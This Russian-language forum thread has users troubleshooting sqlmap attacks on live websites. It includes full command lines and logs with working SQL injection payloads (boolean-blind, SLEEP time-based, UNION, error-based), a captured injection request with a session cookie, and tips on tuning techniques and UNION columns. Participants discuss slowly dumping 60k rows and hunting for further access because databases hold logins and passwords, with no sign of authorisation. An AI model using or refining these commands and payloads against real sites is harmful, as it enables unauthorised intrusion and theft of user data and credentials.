Что я делаю не так ??? Code: D:\>python\python.exe D:\py\sqlmap\sqlmap.py -u http://site.ru/jewell ery.php?subcategory=8&parent_ID=8&sub=&open=339 --dbs ___ __H__ ___ ___[)]_____ ___ ___ {1.1.4.48#dev} |_ -| . [(] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 02:20:02 [02:20:02] [INFO] resuming back-end DBMS 'mysql' [02:20:02] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: subcategory (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: subcategory=8 AND 7118=7118 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: subcategory=8 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: subcategory=8 UNION ALL SELECT CONCAT(0x7162627171,0x7665706c754e46 41694f424f67757945514458435369775648614c62644a56574b536753446d634f,0x7178716271) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Dnsi --- [02:20:08] [INFO] the back-end DBMS is MySQL web application technology: Apache, PHP 5.3.29 back-end DBMS: MySQL >= 5.0.12 [02:20:08] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\ output\site.ru' [*] shutting down at 02:20:08 И почему у меня после выполнения команды вылазиет такое сообщение ? Code: "parent_ID" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. "sub" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. "open" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. D:\>
Code: "parent_ID" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. "sub" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. "open" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. D:\> Это рофл чтоли? Потому что вы пытаетесь выполнить эти параметры, что вы там пишете в командной строке?
Именно sqlmap не может выдавать такие ошибки, это ошибки ос.. Скиньте таргет в лс, мне даже интересно.
Что означает эта ошибка при выполнении команды "update" через --sql-shell: [WARNING] execution of custom SQL queries is only available when stacked queries are supported ? и можно ли найти пути обхода ?
Это говорит о том, что инъекция в SELECT запросе, где не возможно выполнить UPDATE. Условия при которых возможно использование Stacked Queries
Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?
[08:44:51] [INFO] the back-end DBMS is MySQL web application technology: Apache 2, PHP 5.5.38 back-end DBMS: MySQL >= 5.0 [08:44:51] [INFO] fetching database names [08:44:51] [DEBUG] resuming configuration option 'code' (200) [08:44:51] [DEBUG] searching for error chunk length... [08:44:51] [PAYLOAD] 1 AND (SELECT 2283 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT REPEAT(0x34,1024)),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) [08:45:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s) [08:45:22] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads') [08:45:53] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request [08:46:23] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request [08:46:54] [CRITICAL] connection timed out to the target URL or proxy [*] shutting down at 08:46:54 Не хочет мне бд показывать )) Уже и с прокси пробывал и тд.Что делать?
Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba
не соглашусь. --is-dba везде False. это влияет только на возможность работы с файловой системой. а вотредактирование записей в бд может быть может нет. возможно я как то не так запускаю тесты. хотлделал и с максимальными параметрами --level и --risk. все однно. одна и таже cms на разных хостингах . на одном редактирование проходят на других нет.
Подскажи, как правильно ее вставлять в SQLMAP Например, выдало вот такое: Code: GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://site.com/ Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6 Host: site.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* Как правильно вставить ссылку?
что то около того -u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3 если нужен вектор именно boolean то добавь ещё флаг --technique=B
Пару часов назад спорил с одним товарищем по поводу техник Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды Он рекомендует только --technique=EU Так ли это?
Я лично вчера проводил эксперимент с одним сайтом Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд) С --technique=EU - не вскрыл Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге
sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать --union-cols количество колонок --prefix --suffix начало и конец строки для инъекции может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками "но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли